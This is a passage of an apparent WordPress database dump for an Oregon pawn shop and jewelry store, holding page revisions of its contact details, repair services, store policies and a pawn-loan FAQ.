href=\"https://www.google.com/maps/place/15114+SE+McLoughlin+Blvd,+Milwaukie,+OR+97267/@45.413827,-122.629546,17z/data=!3m1!4b1!4m2!3m1!1s0x5495745ed4b97ea3:0x718f1732179ebc6e\" target=\"_blank\">15114 SE MCLOUGHLIN</a>\r\n503-785-1168\r\n\r\n<strong>SALEM</strong>\r\n<a href=\"https://www.google.com/maps/place/1191+Lancaster+Dr+NE,+Salem,+OR+97301/@44.945026,-122.98391,17z/data=!3m1!4b1!4m2!3m1!1s0x54bffec2370440b3:0x851994b509c59f4b\" target=\"_blank\">1191 LANCASTER DR NE</a>\r\n503-362-9939\r\n[/one_half]\r\n[one_half]<iframe src=\"https://www.google.com/maps/d/embed?mid=z4fRDBnmLvwA.ksG2JCjZpLY8&hl=en\" width=\"480\" height=\"480\"></iframe>[/one_half]\r\n[/row_fluid]','Contact','','inherit','open','open','','27-revision-v1','','','2015-03-09 14:18:05','2015-03-09 21:18:05','',27,'http://atgjewelry.com/fuze7/27-revision-v1/',0,'revision','',0),(178,1,'2015-03-09 14:40:24','2015-03-09 21:40:24','<div class=\"home-content-area\">\r\n\r\n[row_fluid]\r\n[one_half]\r\nYour fine jewelry is designed to last a lifetime - with the proper care. That\'s why we offer a complete range of on-site jewelry repair services that include :\r\n\r\n• Jewelry repairs and cleaning/polishing\r\n• Jewelry mounting & remounting\r\n• Stone replacement & retipping prongs\r\n• Plating & antiquing\r\n• Chain & Bracelet soldering, clasp repair\r\n• Change earring backs, replace posts\r\n• Watch Battery Replacement (Average sizes, No divers watches, please)\r\n\r\n[/one_half]\r\n[one_half]\r\nWe offer every day low prices on our jewelry repair and our jeweler can provide you with a free estimate before doing any work. We pride ourselves in quality work, so we evaluate every piece before taking them in to repair. Our jewelers guarantee their work, partial repairs will not be accepted to ensure the piece given back to you will be in exceptional condition.\r\n<h3>Have a question or need an expert opinion?</h3>\r\nOur jewelers are more than happy to share their ideas with you. We service Platinum and 10K, 14K and 18K solid gold jewelry. We do not service gold plated, gold filled jewelry or other metals.[/one_half]\r\n[/row_fluid]\r\n\r\n</div>','Jewelry Repair','','inherit','open','open','','41-revision-v1','','','2015-03-09 14:40:24','2015-03-09 21:40:24','',41,'http://atgjewelry.com/fuze7/41-revision-v1/',0,'revision','',0),(180,1,'2015-03-09 14:42:36','2015-03-09 21:42:36','[row_fluid]\r\n[one_half]\r\nAll That Glitters is a family-owned and operated business serving Oregon\'s Pacific Northwest for more than 25 years. We are a member of the National Pawnbroker\'s Association, and active members of the Oregon Pawnbrokers Association.\r\n\r\nOur goal is to ensure that every customer is treated in the friendliest and fairest way possible. We do this by offering lifetime stone replacement policies and an excellent trade up policy on all of our jewelry. We offer wholesale prices every day with discounts starting at 50% off of Retail Prices on nearly all the jewelry we sell. All other merchandise is researched and priced with you in mind. We want to sell it, we don\'t want to keep it!\r\n\r\n[/one_half]\r\n[one_half]\r\nAll That Glitters is an established, licensed, bonded and insured business with a reputation to maintain. Our goal is to change the way you view Pawnshops by providing you with as close to a retail experience as we can, while keeping our prices at wholesale level or below.\r\n\r\n[/one_half]\r\n[/row_fluid]','Company','','publish','closed','open','','company','','','2015-03-09 14:42:36','2015-03-09 21:42:36','',31,'http://atgjewelry.com/fuze7/?page_id=180',0,'page','',0),(181,1,'2015-03-09 14:42:36','2015-03-09 21:42:36','[row_fluid]\r\n[one_half]\r\nAll That Glitters is a family-owned and operated business serving Oregon\'s Pacific Northwest for more than 25 years. We are a member of the National Pawnbroker\'s Association, and active members of the Oregon Pawnbrokers Association.\r\n\r\nOur goal is to ensure that every customer is treated in the friendliest and fairest way possible. We do this by offering lifetime stone replacement policies and an excellent trade up policy on all of our jewelry. We offer wholesale prices every day with discounts starting at 50% off of Retail Prices on nearly all the jewelry we sell. All other merchandise is researched and priced with you in mind. We want to sell it, we don\'t want to keep it!\r\n\r\n[/one_half]\r\n[one_half]\r\nAll That Glitters is an established, licensed, bonded and insured business with a reputation to maintain. Our goal is to change the way you view Pawnshops by providing you with as close to a retail experience as we can, while keeping our prices at wholesale level or below.\r\n\r\n[/one_half]\r\n[/row_fluid]','Company','','inherit','open','open','','180-revision-v1','','','2015-03-09 14:42:36','2015-03-09 21:42:36','',180,'http://atgjewelry.com/fuze7/180-revision-v1/',0,'revision','',0),(182,1,'2015-03-09 14:43:48','2015-03-09 21:43:48',' ','','','publish','open','open','','182','','','2015-03-10 19:02:03','2015-03-11 02:02:03','',31,'http://atgjewelry.com/fuze7/?p=182',7,'nav_menu_item','',0),(183,1,'2015-03-09 14:50:02','2015-03-09 21:50:02','[row_fluid]\n[one_half]\n<h3>Layaway Policy</h3>\n<ul class=\"listing-check\">\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in-store credit for any monies paid.</li>\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in-store credit for the amount of monies paid.</li>\n <li>If you do not complete payment of an item within the 90-day layaway period, you can request an in-store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\n</ul>\n<h3>Stone Replacement Guarantee</h3>\n<ul class=\"listing-check\">\n <li>Subject to 6-month in-house inspection</li>\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\n <li>Customer’s receipt must be presented at each inspection.</li>\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\n</ul>\n<h3>Refund Policy</h3>\n<ul class=\"listing-check\">\n <li>Jewelry items are given a 7-day money back guarantee in the same form of payment made.</li>\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\n <li>After 7 days (up to 30) you will receive in-store credit in the form of a gift card.</li>\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\n <li>All other merchandise is given a 30-day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\n <li>Clearance case items are AS-IS. No refund, exchange or trade-in allowed.</li>\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\n</ul>\n[/one_half]\n[one_half]\n<h3>Trade-Up Policy</h3>\n\nAll That Glitters offers a wonderful trade-up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.\n<ul class=\"listing-check\">\n <li>Trade-ins must be made at 50% of retail.</li>\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\n <li>Please note trade-up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\n</ul>\n<h3>Privacy Policy</h3>\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\n<ul class=\"listing-check\">\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\n <li>Information about your transactions with us, our affiliates or others.</li>\n</ul>\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must appear in person and present valid ID for us to look up your account information.</p>\nWe restrict access to non-public personal information about you to those employees who need that information to provide products or services to you, and maintain safeguards that restrict access to your non-public personal information.\n\n<h3>Policy Changes and Questions</h\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>\n<p class=\"check\">[/one_half]\n[/row_fluid]</p>','Guidelines/Policies','','inherit','open','open','','45-autosave-v1','','','2015-03-09 14:50:02','2015-03-09 21:50:02','',45,'http://atgjewelry.com/fuze7/45-autosave-v1/',0,'revision','',0),(184,1,'2015-03-09 14:47:12','2015-03-09 21:47:12','[fluid_row]\r\n[one_half]\r\n<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in-store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in-store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of an item within the 90-day layaway period, you can request an in-store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\nStone Replacement Guarantee\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6-month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\nRefund Policy\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7-day money back guarantee in the same form of payment made.</li>\r\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\r\n <li>After 7 days (up to 30) you will receive in-store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30-day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade-in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\n[/one_half]\r\n[one_half]\r\nTrade-Up Policy\r\n\r\nAll That Glitters offers a wonderful trade-up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.\r\n<ul class=\"listing-check\">\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n <li>Please note trade-up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\r\n</ul>\r\nPrivacy Policy\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must appear in person and present valid ID for us to look up your account information.</p>\r\nWe restrict access to non-public personal information about you to those employees who need that information to provide products or services to you, and maintain safeguards that restrict access to your non-public personal information.\r\n\r\nPolicy Changes and Questions\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>\r\n<p class=\"check\">[/one_half]\r\n[/fluid_row]</p>','Guidelines/Policies','','inherit','open','open','','45-revision-v1','','','2015-03-09 14:47:12','2015-03-09 21:47:12','',45,'http://atgjewelry.com/fuze7/45-revision-v1/',0,'revision','',0),(185,1,'2015-03-09 14:48:31','2015-03-09 21:48:31','[row_fluid]\r\n[one_half]\r\n<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in-store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in-store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of an item within the 90-day layaway period, you can request an in-store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\nStone Replacement Guarantee\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6-month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\nRefund Policy\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7-day money back guarantee in the same form of payment made.</li>\r\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\r\n <li>After 7 days (up to 30) you will receive in-store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30-day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade-in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\n[/one_half]\r\n[one_half]\r\nTrade-Up Policy\r\n\r\nAll That Glitters offers a wonderful trade-up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.\r\n<ul class=\"listing-check\">\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n <li>Please note trade-up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\r\n</ul>\r\nPrivacy Policy\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must appear in person and present valid ID for us to look up your account information.</p>\r\nWe restrict access to non-public personal information about you to those employees who need that information to provide products or services to you, and maintain safeguards that restrict access to your non-public personal information.\r\n\r\nPolicy Changes and Questions\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>\r\n<p class=\"check\">[/one_half]\r\n[/row_fluid]</p>','Guidelines/Policies','','inherit','open','open','','45-revision-v1','','','2015-03-09 14:48:31','2015-03-09 21:48:31','',45,'http://atgjewelry.com/fuze7/45-revision-v1/',0,'revision','',0),(186,1,'2015-03-09 14:50:19','2015-03-09 21:50:19','[row_fluid]\r\n[one_half]\r\n<h3>Layaway Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Layaways are good for 90 days and require a 20% down payment.</li>\r\n <li>Jewelry Purchase: If you change your mind within the first seven days following the date a jewelry item is put into layaway, you are entitled to receive a refund in the amount of the down payment.</li>\r\n <li>If you change your mind after seven days following the date a jewelry item is put into layaway, you will be given an in-store credit for any monies paid.</li>\r\n <li>Hard good Purchase: If, at any time during the 90 day layaway period, you change your mind regarding a layaway purchase, you will not receive a cash refund, but you will be given an in-store credit for the amount of monies paid.</li>\r\n <li>If you do not complete payment of an item within the 90-day layaway period, you can request an in-store credit within one year of the original date of the layaway. After one year, the funds are forfeited.</li>\r\n</ul>\r\n<h3>Stone Replacement Guarantee</h3>\r\n<ul class=\"listing-check\">\r\n <li>Subject to 6-month in-house inspection</li>\r\n <li>The customer is responsible for completing all maintenance suggested by All That Glitters at the time of inspection. All That Glitters Stone Replacement Guarantee is not in effect if the customer chooses not to maintain the jewelry.</li>\r\n <li>Customer’s receipt must be presented at each inspection.</li>\r\n <li>This policy guarantees loss of stones due to normal wear and does not cover abuse of jewelry (ie: banging of jewelry against hard surfaces).</li>\r\n</ul>\r\n<h3>Refund Policy</h3>\r\n<ul class=\"listing-check\">\r\n <li>Jewelry items are given a 7-day money back guarantee in the same form of payment made.</li>\r\n <li>Laptops and Tablets are given a 72-hour warranty. If the equipment isn\'t working, just bring it back along with your original receipt within 72 hours for a full refund.</li>\r\n <li>After 7 days (up to 30) you will receive in-store credit in the form of a gift card.</li>\r\n <li>After 30 days, you also have the option to sell your jewelry back for half of the amount paid. Offer only good for original purchaser, and you must have the original sales receipt. You may also get a loan on your item any time as long as you keep your receipt. Loans are calculated at half of the amount paid. Original receipt must be presented at every loan transaction.</li>\r\n <li>All other merchandise is given a 30-day functional guarantee. You can exchange merchandise if it is not working for a like item, or receive a gift card for the amount you paid.</li>\r\n <li>Clearance case items are AS-IS. No refund, exchange or trade-in allowed.</li>\r\n <li>All claims and goods MUST be accompanied by the purchaser and the original sales receipt.</li>\r\n</ul>\r\n[/one_half]\r\n[one_half]\r\n<h3>Trade-Up Policy</h3>\r\n\r\nAll That Glitters offers a wonderful trade-up policy allowing you to upgrade your jewelry purchase at a minimum cost of $50.00.Just keep your original sales receipt, and when you are ready to upgrade your jewelry, bring it in. All That Glitters will give you full value of what you paid towards your next purchase. You only need to spend an additional $50.00 on the new item.\r\n<ul class=\"listing-check\">\r\n <li>Trade-ins must be made at 50% of retail.</li>\r\n <li>Sorry, only one item for one item is allowed. The Policy is set up so you can keep upgrading into the size stone you love.</li>\r\n <li>Jewelry must be accompanied by a receipt and the person named on the receipt. This offer excludes hard good items and items stamped AS IS.</li>\r\n <li>Please note trade-up purchases are sold as-is only. No refunds of any kind are granted on a trade-up purchase.</li>\r\n</ul>\r\n<h3>Privacy Policy</h3>\r\n<p class=\"check\">All That Glitters collects customer information to improve your overall shopping experience with us. We respect your privacy and are committed to maintaining and using this information responsibly.</p>\r\nWe collect non-public personal information about you as a consumer, customer or former customer from the following sources:\r\n<ul class=\"listing-check\">\r\n <li>Information we receive from you on our loan contracts, buy forms, sales documents or other forms.</li>\r\n <li>Information about your transactions with us, our affiliates or others.</li>\r\n</ul>\r\n<p class=\"check\">We do not disclose any non-public information about our customers or former customers to anyone, except to our affiliates and as permitted by law. We do not give out information over the phone to anyone including you. You must appear in person and present valid ID for us to look up your account information.</p>\r\nWe restrict access to non-public personal information about you to those employees who need that information to provide products or services to you, and maintain safeguards that restrict access to your non-public personal information.\r\n\r\n<h3>Policy Changes and Questions</h3>\r\n<p class=\"check\">All That Glitters may update our privacy policy from time to time and use of the information we collect is now subject to the privacy policy in effect at the time of use. If you have any questions or concerns regarding our privacy policy, please contact us.</p>\r\n[/one_half]\r\n[/row_fluid]','Guidelines/Policies','','inherit','open','open','','45-revision-v1','','','2015-03-09 14:50:19','2015-03-09 21:50:19','',45,'http://atgjewelry.com/fuze7/45-revision-v1/',0,'revision','',0),(187,1,'2015-03-09 14:51:57','2015-03-09 21:51:57','[row_fluid]\n[one_half]\n<h3>Layaway Policy</h3>\nA pawn is a collateral loan. A pawnbroker is one who lends money while holding an item of value as collateral.\n<h3>What if I don\'t want to Pawn my item? Will you buy outright?</h3>\nWe will purchase any item we would loan on. Usually, for the same amount.\n<h3>What do I need to get a loan?</h3>\nA state issued drivers license or ID card from any state is required. If you have an out of state ID card, you must present a second piece of ID. By law, we can not take anything from you without ID. *You must be 18 years of age or older to take out a loan.\n<h3>Is my transaction confidential?</h3>\nAbsolutely, we respect your privacy. All transaction & personal information collected is confidential. See our \"Privacy Policy\".\n<h3>Am I guaranteed to get my item back when I repay the loan?</h3>\nAbsolutely! As long as you return while the loan is active your property is safely stored. Your pledge will be sold ONLY if you do not return for it within your loan period.\n<h3>My loan slip says Bearer Contract, what does that mean?</h3>\nIn the state of Oregon, pawn slips are \"Bearer Contracts\". This means that whomever is in possession of your pink slip is considered the owner of your items. We recommend you keep it in a safe.\n<h3>Can I get more money later?</h3>\nOnce a pawn loan is written, we can not change the amount. If we are able to loan a higher amount you can redeem your item, we may write a new loan for the higher amount.\n<h3>I lost my ticket....what now?</h3>\nBring in the Identification used to take out your loan (Driver\'s license or ID) & you may redeem your item. There is a $3.00 fee for lost contracts.\n<h3>What happens if I don\'t come back for my item?</h3>\nIf you don\'t repay the loan, after 90 days (60 days if renewed) the pawned item(s) becomes the property of ATG.\n<h3>Can I get my items if it\'s past the due date?</h3>\nRest assured, we want everyone to have their property. If the item(s) is still on premises when you arrive, you can buy it back from us. If the item(s) have left the premises, unfortunately, at that point they are unable to be reclaimed.\n[/one_half]\n[one_half]\n<h3>Do you offer Layaway?</h3>\nWe are pleased to offer \"Interest-Free Layaways\". With just 20% down you can put any item in the store on Layaway for up to 90 days.\n<h3>Why buy from us?</h3>\nATG is an established, licensed, bonded & insured business with a reputation to maintain. Our industry is closely regulated & monitored. Every single item that passes through our store is not only examined for function & serviceability, it also has its model & serial numbers reported to our local police departments to check against the police databases. This should reassure you. After all, what other store can guarantee that their merchandise has been screened in this way? Why buy second-hand? Our stores offer a great opportunity to purchase items at a reduced price. We offer a 30-day functional warranty on non-jewelry items. Our jewelry is guaranteed & comes with a lifetime stone replacement warranty. See our Sales Policies here.\n<h3>How do I know it\'s not stolen?</h3>\nQuoted: \"Nationally less than one (1%) percent of all loans are stolen, of those a good 80% are family related. Over 78,000 people are employed in the industry, which contributes 1.6 billion dollars in salaries to the nation\'s economy. Approximately 303 million dollars in sales & property taxes are contributed by the industry. Capital investments of over 9 billion dollars are from the Pawn industry. There are over 34 million customers served yearly by pawnshops.\"\n\nIn conclusion, there is a great deal of misunderstanding concerning the pawn business. It is a business that combines retail sales with old fashioned banking & serves a clientele that includes all income brackets. Those involved work diligently toward keeping their business legal as well as serving a needed purpose in the community of loaning to those whom the banks will never acknowledge.\n[/one_half]\n[/row_fl','FAQ\'s','','inherit','open','open','','120-autosave-v1','','','2015-03-09 14:51:57','2015-03-09 21:51:57','',120,'http://atgjewelry.com/fuze7/120-autosave-v1/',0,'revision','',0),(188,1,'2015-03-09 14:52:13','2015-03-09 21:52:13','[row_fluid]\r\n[one_half]\r\n<h3>Layaway Policy</h3>\r\nA pawn is a collateral loan. A pawnbroker is one who lends money while holding an item of value as collateral.\r\n<h3>What if I don\'t want to Pawn my item? Will you buy outright?</h3>\r\nWe will purchase any item we would loan on. Usually, for the same amount.\r\n<h3>What do I need to get a loan?</h3>\r\nA state issued drivers license or ID card from any state is required. If you have an out of state ID card, you must present a second piece of ID. By law, we can not take anything from you without ID. *You must be 18 years of age or older to take out a loan.\r\n<h3>Is my transaction confidential?</h3>\r\nAbsolutely, we respect your privacy. All transaction & personal information collected is confidential. See our \"Privacy Policy\".\r\n<h3>Am I guaranteed to get my item back when I repay the loan?</h3>\r\nAbsolutely! As long as you return while the loan is active your property is safely stored. Your pledge will be sold ONLY if you do not return for it within your loan period.\r\n<h3>My loan slip says Bearer Contract, what does that mean?</h3>\r\nIn the state of Oregon, pawn slips are \"Bearer Contracts\". This means that whomever is in possession of your pink slip is considered the owner of your items. We recommend you keep it in a safe.\r\n<h3>Can I get more money later?</h3>\r\nOnce a pawn loan is written, we can not change the amount. If we are able to loan a higher amount you can redeem your item, we may write a new loan for the higher amount.\r\n<h3>I lost my ticket....what now?</h3>\r\nBring in the Identification used to take out your loan (Driver\'s license or ID) & you may redeem your item. There is a $3.00 fee for lost contracts.\r\n<h3>What happens if I don\'t come back for my item?</h3>\r\nIf you don\'t repay the loan, after 90 days (60 days if renewed) the pawned item(s) becomes the property of ATG.\r\n<h3>Can I get my items if it\'s past the due date?</h3>\r\nRest assured, we want everyone to have their property. If the item(s) is still on premises when you arrive, you can buy it back from us. If the item(s) have left the premises, unfortunately, at that point they are unable to be reclaimed.\r\n[/one_half]\r\n[one_half]\r\n<h3>Do you offer Layaway?</h3>\r\nWe are pleased to offer \"Interest-Free Layaways\". With just 20% down you can put any item in the store on Layaway for up to 90 days.\r\n<h3>Why buy from us?</h3>\r\nATG is an established, licensed, bonded & insured business with a reputation to maintain. Our industry is closely regulated & monitored. Every single item that passes through our store is not only examined for function & serviceability, it also has its model & serial numbers reported to our local police departments to check against the police databases. This should reassure you. After all, what other store can guarantee that their merchandise has been screened in this way? Why buy second-hand? Our stores offer a great opportunity to purchase items at a reduced price. We offer a 30-day functional warranty on non-jewelry items. Our jewelry is guaranteed & comes with a lifetime stone replacement warranty. See our Sales Policies here.\r\n<h3>How do I know it\'s not stolen?</h3>\r\nQuoted: \"Nationally less than one (1%) percent of all loans are stolen, of those a good 80% are family related. Over 78,000 people are employed in the industry, which contributes 1.6 billion dollars in salaries to the nation\'s economy. Approximately 303 million dollars in sales & property taxes are contributed by the industry. Capital investments of over 9 billion dollars are from the Pawn industry. There are over 34 million customers served yearly by pawnshops.\"\r\n\r\nIn conclusion, there is a great deal of misunderstanding concerning the pawn business. It is a business that combines retail sales with old fashioned banking & serves a clientele that includes all income brackets. Those involved work diligently toward keeping their business legal as well as serving a needed purpose in the community of loaning to those whom the banks will never acknowledge.\r\n[/one_half]\r\n[/row_fluid]','FAQ\'s','','inherit','open','open','','120-revision-v1','','','2015-03-09 14:52:13','2015-03-09 21:52:13','',120,'http://atgjewelry.com/fuze7/120-revision-v1/',0,'revision','',0),(189,1,'2015-03-09 15:03:53','2015-03-09 22:03:53','','Citizen Watch','','publish','open','closed','','citizen-watch','','','2015-03-09 15:03:53','2015-03-09 22:03:53','',0,'http://atgjewelry.com/fuze7/?post_type=product&p=189',0,'product','',0),(190,1,'2015-03-09 15:03:06','2015-03-09 22:03:06','','Citizen-Watch-BY2000-55W-1-300x300','','inherit','open','open','','citizen-watch-by2000-55w-1-300x300','','','2015-03-09 15:03:06','2015-03-09 22:03:06','',189,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Citizen-Watch-BY2000-55W-1-300x300.png',0,'attachment','image/png',0),(191,1,'2015-03-09 15:16:57','2015-03-09 22:16:57','Lorem ipsum','Citizen Grid','Excerpt','publish','closed','open','','citizen-grid','','','2015-03-09 15:16:57','2015-03-09 22:16:57','',0,'http://atgjewelry.com/fuze7/?post_type=portfolio&p=191',0,'portfolio','',0),(193,1,'2015-03-09 19:18:48','2015-03-10 02:18:48','Lorem ipsum','Service','','publish','closed','closed','','service','','','2015-03-09 19:18:48','2015-03-10 02:18:48','',0,'http://atgjewelry.com/fuze7/?post_type=services&p=193',0,'services','',0),(194,1,'2015-03-09 19:29:07','2015-03-10 02:29:07','','Gold Coins','','publish','closed','closed','','gold-coins','','','2015-03-10 17:18:48','2015-03-11 00:18:48','',0,'http://atgjewelry.com/fuze7/?post_type=slider&p=194',0,'slider','',0),(195,1,'2015-03-09 19:28:54','2015-03-10 02:28:54','Five Dollars gold coins USD','Five Dollars gold coins','','inherit','open','open','','five-dollars-gold-coins','','','2015-03-09 19:29:03','2015-03-10 02:29:03','',194,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Gold-Coins.jpg',0,'attachment','image/jpeg',0),(196,1,'2015-03-09 19:29:46','2015-03-10 02:29:46','','Gold Jewelry','','publish','closed','closed','','gold-jewelry','','','2015-03-10 17:17:43','2015-03-11 00:17:43','',0,'http://atgjewelry.com/fuze7/?post_type=slider&p=196',0,'slider','',0),(197,1,'2015-03-09 19:29:32','2015-03-10 02:29:32','Closeup of yellow gold jewelery on a black background','Gold Jewelry','','inherit','open','open','','gold-jewelry','','','2015-03-09 19:29:42','2015-03-10 02:29:42','',196,'http://atgjewelry.com/fuze7/wp-content/uploads/2015/03/Gold-Jewelry.jpg',0,'attachment','image/jpeg',0),(198,1,'2015-03-09 19:30:36','2015-03-10 02:30:36','','Gold and Diamond Jewelry','','publish','closed','closed','','gold-and-diamond-jewelry','','','2015-03-10 17:18:27','2015-03-11 00:18:27','',0,'http://atgjewelry.com/fuze7/?post_type=slider&p=198',0,'slider','',0),(199,1,'2015-03-09 19:30:13','2015-03-10 02:30:13','Closeup of gold jewelery with precious stones','Gold Jewelry','','inherit','open','open','','gold-jewelry-2','','','2015-03-09 19:30:33','2015-03-10 